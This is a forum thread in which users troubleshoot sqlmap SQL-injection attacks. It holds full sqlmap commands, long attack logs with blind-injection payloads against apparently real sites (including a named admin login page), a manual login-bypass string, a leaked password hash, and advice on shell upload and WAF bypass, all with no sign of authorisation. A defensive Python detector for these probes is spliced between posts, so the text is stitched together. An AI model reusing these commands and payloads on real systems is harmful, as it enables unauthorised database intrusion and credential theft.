Questions about SQLMap

Discussion in 'Vulnerabilities' started by randman, 1 Oct 2015.

  1. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    1,762
    Likes Received:
    6,559
    Reputations:
    96
    what a lie ...
     
  2. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    253
    Likes Received:
    14
    Reputations:
    0
    SQLmap cracks this type of hole quickly for me
     
  3. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    1,762
    Likes Received:
    6,559
    Reputations:
    96
    Wow, so you actually hacked that ICO corporation?
     
    BabaDook likes this.
  4. Mafter

    Mafter New Member

    Joined:
    29 Mar 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    And what if Blind SQL injection is the same thing as SQL injection?? That is, the links are identical
     
  5. Миxей

    Миxей Member

    Joined:
    26 Aug 2009
    Messages:
    10
    Likes Received:
    12
    Reputations:
    0
    How do you upload a shell using sqlmap?
    --os-shell and brute-force the local paths?
     
  6. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    44
    Likes Received:
    22
    Reputations:
    2
    You were already answered in the neighbouring thread: the user you are running as does not have enough privileges for that!
     
  7. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    572
    Likes Received:
    45
    Reputations:
    0
    Any advice on how to deal with this? I'm trying to get the tables and it returns a 406 error
    Code:
    sqlmap.py -r 1.txt --level=1 --risk=1 --banner -v 3 --union-cols=1-66 --dbms="MySQL" --technique=EBU --identify-waf --no-cast -D database --tables
            ___
           __H__
     ___ ___[)]_____ ___ ___  {1.2.4.2#dev}
    |_ -| . [)]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 01:56:40
    
    [01:56:40] [INFO] parsing HTTP request from '1.txt'
    [01:56:40] [DEBUG] not a valid WebScarab log data
    [01:56:40] [DEBUG] cleaning up configuration parameters
    [01:56:40] [DEBUG] loading WAF script '360'
    [01:56:40] [DEBUG] loading WAF script 'airlock'
    [01:56:40] [DEBUG] loading WAF script 'anquanbao'
    [01:56:40] [DEBUG] loading WAF script 'armor'
    [01:56:40] [DEBUG] loading WAF script 'asm'
    [01:56:40] [DEBUG] loading WAF script 'aws'
    [01:56:40] [DEBUG] loading WAF script 'baidu'
    [01:56:40] [DEBUG] loading WAF script 'barracuda'
    [01:56:40] [DEBUG] loading WAF script 'bigip'
    [01:56:40] [DEBUG] loading WAF script 'binarysec'
    [01:56:40] [DEBUG] loading WAF script 'blockdos'
    [01:56:40] [DEBUG] loading WAF script 'ciscoacexml'
    [01:56:40] [DEBUG] loading WAF script 'cloudflare'
    [01:56:40] [DEBUG] loading WAF script 'cloudfront'
    [01:56:40] [DEBUG] loading WAF script 'comodo'
    [01:56:40] [DEBUG] loading WAF script 'datapower'
    [01:56:40] [DEBUG] loading WAF script 'denyall'
    [01:56:40] [DEBUG] loading WAF script 'dosarrest'
    [01:56:40] [DEBUG] loading WAF script 'dotdefender'
    [01:56:40] [DEBUG] loading WAF script 'edgecast'
    [01:56:40] [DEBUG] loading WAF script 'expressionengine'
    [01:56:40] [DEBUG] loading WAF script 'fortiweb'
    [01:56:40] [DEBUG] loading WAF script 'generic'
    [01:56:40] [DEBUG] loading WAF script 'hyperguard'
    [01:56:40] [DEBUG] loading WAF script 'incapsula'
    [01:56:40] [DEBUG] loading WAF script 'isaserver'
    [01:56:40] [DEBUG] loading WAF script 'jiasule'
    [01:56:40] [DEBUG] loading WAF script 'knownsec'
    [01:56:40] [DEBUG] loading WAF script 'kona'
    [01:56:40] [DEBUG] loading WAF script 'modsecurity'
    [01:56:40] [DEBUG] loading WAF script 'naxsi'
    [01:56:40] [DEBUG] loading WAF script 'netcontinuum'
    [01:56:40] [DEBUG] loading WAF script 'netscaler'
    [01:56:40] [DEBUG] loading WAF script 'newdefend'
    [01:56:40] [DEBUG] loading WAF script 'nsfocus'
    [01:56:40] [DEBUG] loading WAF script 'paloalto'
    [01:56:40] [DEBUG] loading WAF script 'profense'
    [01:56:40] [DEBUG] loading WAF script 'proventia'
    [01:56:40] [DEBUG] loading WAF script 'radware'
    [01:56:40] [DEBUG] loading WAF script 'requestvalidationmode'
    [01:56:40] [DEBUG] loading WAF script 'safe3'
    [01:56:40] [DEBUG] loading WAF script 'safedog'
    [01:56:40] [DEBUG] loading WAF script 'secureiis'
    [01:56:40] [DEBUG] loading WAF script 'senginx'
    [01:56:40] [DEBUG] loading WAF script 'sitelock'
    [01:56:40] [DEBUG] loading WAF script 'sonicwall'
    [01:56:40] [DEBUG] loading WAF script 'sophos'
    [01:56:40] [DEBUG] loading WAF script 'stingray'
    [01:56:40] [DEBUG] loading WAF script 'sucuri'
    [01:56:40] [DEBUG] loading WAF script 'tencent'
    [01:56:40] [DEBUG] loading WAF script 'teros'
    [01:56:40] [DEBUG] loading WAF script 'trafficshield'
    [01:56:40] [DEBUG] loading WAF script 'urlscan'
    [01:56:40] [DEBUG] loading WAF script 'uspses'
    [01:56:40] [DEBUG] loading WAF script 'varnish'
    [01:56:40] [DEBUG] loading WAF script 'wallarm'
    [01:56:40] [DEBUG] loading WAF script 'watchguard'
    [01:56:40] [DEBUG] loading WAF script 'webappsecure'
    [01:56:40] [DEBUG] loading WAF script 'webknight'
    [01:56:40] [DEBUG] loading WAF script 'wordfence'
    [01:56:40] [DEBUG] loading WAF script 'yundun'
    [01:56:40] [DEBUG] loading WAF script 'yunsuo'
    [01:56:40] [DEBUG] loading WAF script 'zenedge'
    [01:56:40] [DEBUG] setting the HTTP timeout
    [01:56:40] [DEBUG] creating HTTP requests opener object
    [01:56:40] [DEBUG] forcing back-end DBMS to user defined value
    custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
    [01:56:41] [DEBUG] resolving hostname 'url'
    [01:56:41] [INFO] testing connection to the target URL
    [01:56:41] [DEBUG] declared web page charset 'utf-8'
    [01:56:41] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
    [01:56:41] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
    [01:56:41] [DEBUG] checking for WAF/IPS/IDS product '360 Web Application Firewall (360)'
    [01:56:41] [DEBUG] declared web page charset 'iso-8859-1'
    [01:56:41] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Airlock (Phion/Ergon)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Anquanbao Web Application Firewall (Anquanbao)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Armor Protection (Armor Defense)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Application Security Manager (F5 Networks)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Amazon Web Services Web Application Firewall (Amazon)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Yunjiasu Web Application Firewall (Baidu)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Barracuda Web Application Firewall (Barracuda Networks)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BIG-IP Application Security Manager (F5 Networks)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BinarySEC Web Application Firewall (BinarySEC)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BlockDoS'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Cisco ACE XML Gateway (Cisco Systems)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFlare Web Application Firewall (CloudFlare)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFront (Amazon)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Comodo Web Application Firewall (Comodo)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'IBM WebSphere DataPower (IBM)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Deny All Web Application Firewall (DenyAll)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'DOSarrest (DOSarrest Internet Security)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'dotDefender (Applicure Technologies)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'EdgeCast WAF (Verizon)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ExpressionEngine (EllisLab)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'FortiWeb Web Application Firewall (Fortinet)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Hyperguard Web Application Firewall (art of defence)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ISA Server (Microsoft)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Jiasule Web Application Firewall (Jiasule)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KS-WAF (Knownsec)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KONA Security Solutions (Akamai Technologies)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NAXSI (NBS System)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetScaler (Citrix Systems)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Newdefend Web Application Firewall (Newdefend)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NSFOCUS Web Application Firewall (NSFOCUS)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Palo Alto Firewall (Palo Alto Networks)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Profense Web Application Firewall (Armorlogic)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Proventia Web Application Security (IBM)'
    [01:56:42] [DEBUG] page not found (404)
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'AppWall (Radware)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ASP.NET RequestValidationMode (Microsoft)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safe3 Web Application Firewall'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safedog Web Application Firewall (Safedog)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SecureIIS Web Server Security (BeyondTrust)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SEnginx (Neusoft Corporation)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'TrueShield Web Application Firewall (SiteLock)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SonicWALL (Dell)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'UTM Web Protection (Sophos)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Stingray Application Firewall (Riverbed / Brocade)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudProxy WebSite Firewall (Sucuri)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Tencent Cloud Web Application Firewall (Tencent Cloud Computing)'
    [01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'TrafficShield (F5 Networks)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'UrlScan (Microsoft)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'USP Secure Entry Server (United Security Providers)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Varnish FireWall (OWASP)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wallarm Web Application Firewall (Wallarm)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WatchGuard (WatchGuard Technologies)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'webApp.secure (webScurity)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WebKnight Application Firewall (AQTRONIX)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wordfence (Feedjit)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yundun Web Application Firewall (Yundun)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yunsuo Web Application Firewall (Yunsuo)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Zenedge Web Application Firewall (Zenedge)'
    [01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Generic (Unknown)'
    [01:56:43] [CRITICAL] WAF/IPS/IDS identified as 'Generic (Unknown)'
    [01:56:43] [WARNING] WAF/IPS/IDS specific response can be found in 'c:\users\artem\appdata\local\temp\sqlmapuumtkb12408\sqlmapresponse-opc2v1'. If you know the details on used protection please report it along with specific response to 'dev@sqlmap.org'
    are you sure that you want to continue with further target testing? [y/N] y
    [01:56:44] [WARNING] please consider usage of tamper scripts (option '--tamper')
    
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: #1* ((custom) POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: EmailAddress=1' AND 3169=3169 AND 'pwZw'='pwZw
        Vector: AND [INFERENCE]
    ---
    [01:56:44] [INFO] testing MySQL
    [01:56:44] [DEBUG] resuming configuration option 'code' (200)
    [01:56:44] [INFO] confirming MySQL
    [01:56:44] [INFO] the back-end DBMS is MySQL
    [01:56:44] [INFO] fetching banner
    [01:56:44] [INFO] resumed: 5.6.39-cll-lve
    [01:56:44] [DEBUG] performed 0 queries in 0.00 seconds
    web application technology: Apache, PHP 7.1.14
    back-end DBMS: MySQL >= 5.0.0
    banner:    '5.6.39-cll-lve'
    [01:56:44] [INFO] fetching tables for database: 'database'
    [01:56:44] [INFO] fetching number of tables for database 'database'
    [01:56:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>51 AND 'tjzX'='tjzX
    [01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:44] [WARNING] unexpected HTTP code '406' detected. Will use (extra) validation step in similar cases
    [01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>48 AND 'tjzX'='tjzX
    [01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>9 AND 'tjzX'='tjzX
    [01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
    [01:56:44] [INFO] retrieved:
    [01:56:44] [DEBUG] performed 3 queries in 0.51 seconds
    [01:56:44] [WARNING] unable to retrieve the number of tables for database 'database'
    [01:56:44] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] n
    No tables found
    [01:56:46] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 1 times, 406 (Not Acceptable) - 6 times
    [01:56:46] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
    [01:56:46] [INFO] fetched data logged to text files under 'C:\Users\user\.sqlmap\output\url'
    
     
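The defender's side of the run above, as an added example that is neither the poster's code nor part of sqlmap: it scores logged parameter values against the probe patterns visible in that output (numeric tautologies, ORD(MID(...)) inference, INFORMATION_SCHEMA enumeration, hex literals, quote re-balancing) and counts the 4xx answers per source, which is the signal sqlmap itself warns about at the end of the run. The JSON log records, field names and thresholds are constructed assumptions.

```python
"""Flag SQL-injection probing of the kind visible in the sqlmap run above.

Added example: the log records below are constructed JSON lines in the shape
an application or WAF might emit when it logs a request's parameter value
together with the response status. Field names and thresholds are assumed.
"""
import json
import re
from collections import defaultdict

# Signatures for the boolean-based blind probes seen in the thread:
# tautologies (AND 3169=3169), character-by-character inference via
# ORD(MID(...)), INFORMATION_SCHEMA enumeration, hex-encoded literals and
# the trailing quote re-balancing ('pwZw'='pwZw) that sqlmap appends.
SIGNATURES = {
    "tautology": re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I),
    "char_inference": re.compile(r"\bORD\s*\(\s*MID\s*\(", re.I),
    "schema_enum": re.compile(r"INFORMATION_SCHEMA\s*\.\s*TABLES", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{8,}\b", re.I),
    "quote_balance": re.compile(r"'\s*=\s*'\w+'?$"),
}

# Constructed sample: one legitimate client and one client sending probes
# that are answered with 406, as in the run above (0x74657374 is just "test").
SAMPLE_LOG = """
{"ts": "01:56:40", "src": "198.51.100.7", "param": "EmailAddress", "status": 200, "value": "alice@example.com"}
{"ts": "01:56:41", "src": "203.0.113.9", "param": "EmailAddress", "status": 406, "value": "1' AND 3169=3169 AND 'pwZw'='pwZw"}
{"ts": "01:56:44", "src": "203.0.113.9", "param": "EmailAddress", "status": 406, "value": "1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x74657374),1,1))>51 AND 'tjzX'='tjzX"}
{"ts": "01:56:44", "src": "203.0.113.9", "param": "EmailAddress", "status": 406, "value": "1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x74657374),1,1))>48 AND 'tjzX'='tjzX"}
{"ts": "01:56:45", "src": "198.51.100.7", "param": "EmailAddress", "status": 200, "value": "bob@example.com"}
"""


def classify(value):
    """Return the names of every signature that matches one parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def analyse(log_text, min_hits=2, min_4xx=2):
    """Parse JSON log lines and return a per-source verdict dictionary.

    A source is flagged when at least `min_hits` of its requests carried a
    value matching a signature, or when at least `min_4xx` of its requests
    were answered with a 4xx status (a burst of 4xx codes is what sqlmap
    reports as "some kind of protection is involved").
    """
    stats = defaultdict(lambda: {"hits": 0, "status_4xx": 0, "signatures": set()})
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        s = stats[rec["src"]]
        matched = classify(rec["value"])
        if matched:
            s["hits"] += 1
            s["signatures"].update(matched)
        if 400 <= rec["status"] < 500:
            s["status_4xx"] += 1
    verdicts = {}
    for src, s in stats.items():
        verdicts[src] = {
            "flagged": s["hits"] >= min_hits or s["status_4xx"] >= min_4xx,
            "hits": s["hits"],
            "status_4xx": s["status_4xx"],
            "signatures": sorted(s["signatures"]),
        }
    return verdicts


if __name__ == "__main__":
    for src, verdict in analyse(SAMPLE_LOG).items():
        print(src, verdict)
```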
  8. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    783
    Likes Received:
    912
    Reputations:
    58
    Bypass the WAF.
     
  9. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    572
    Likes Received:
    45
    Reputations:
    0
    Generic WAF, I have never run into it. Is there even a tamper script for it in sqlmap?
     
  10. LoginUserName

    LoginUserName New Member

    Joined:
    14 Apr 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    sqlmap dumps passwords incorrectly, like this: $1$JJCSUHzQ$fJoUTRgTvE\\/6CsiTRtfFC. Moreover, it inserts backslashes in different places each time. How can this be fixed? It is an md5(unix) hash
     
  11. Muracha

    Muracha New Member

    Joined:
    30 Jul 2011
    Messages:
    127
    Likes Received:
    3
    Reputations:
    0
    I'm using sqlmap to list tables via POST
    What really confuses me is that when you check by hand there is an error when submitting admin'
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 2' at line 1

    Or "user not found" if you submit:

    Code:
    username=" or ""="&" or ""="=admin&login=1
    Sqlmap says completely different things

    How do I list the table, or at least log in as admin?
    And why does nothing come out with the standard sqlmap options?


    Code:
    root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql
            ___
           __H__
     ___ ___[.]_____ ___ ___  {1.1.12#stable}
    |_ -| . ["]     | .'| . |
    |___|_  [,]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 21:38:30
    
    [21:38:30] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060326 Firefox/1.5.0.3 (Debian-1.5.dfsg+1.5.0.3-2)'
    [21:38:31] [INFO] testing connection to the target URL
    [21:38:31] [INFO] testing if the target URL content is stable
    [21:38:32] [INFO] target URL content is stable
    [21:38:32] [INFO] testing if POST parameter 'username' is dynamic
    [21:38:32] [INFO] confirming that POST parameter 'username' is dynamic
    [21:38:32] [INFO] POST parameter 'username' is dynamic
    [21:38:32] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
    [21:38:33] [INFO] testing for SQL injection on POST parameter 'username'
    for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
    [21:38:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [21:38:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
    [21:38:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
    [21:38:46] [WARNING] reflective value(s) found and filtering out
    [21:38:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)'
    [21:39:07] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [21:39:20] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
    [21:39:32] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
    [21:39:44] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
    [21:39:56] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
    [21:40:09] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
    [21:40:22] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
    [21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
    [21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
    [21:40:36] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace'
    [21:40:36] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
    [21:40:36] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
    [21:40:38] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
    [21:40:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
    [21:40:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
    [21:40:39] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
    [21:40:40] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
    [21:40:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
    [21:40:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
    [21:41:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
    [21:41:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
    [21:41:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
    [21:41:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
    [21:41:33] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
    [21:41:41] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
    [21:41:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [21:41:56] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [21:42:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [21:42:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [21:42:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [21:42:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [21:42:35] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [21:42:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
    [21:42:50] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
    [21:42:57] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
    [21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
    [21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
    [21:43:04] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
    [21:43:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
    [21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
    [21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
    [21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
    [21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
    [21:43:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
    [21:43:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
    [21:43:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
    [21:43:06] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
    [21:43:06] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
    [21:43:06] [INFO] testing 'MySQL inline queries'
    [21:43:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
    [21:43:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [21:43:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
    [21:43:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
    [21:43:33] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
    [21:43:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
    [21:43:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
    [21:43:54] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
    [21:44:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
    [21:44:13] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (comment)' injectable
    [21:44:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [21:44:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    [21:44:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [21:44:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [21:44:14] [INFO] target URL appears to have 5 columns in query
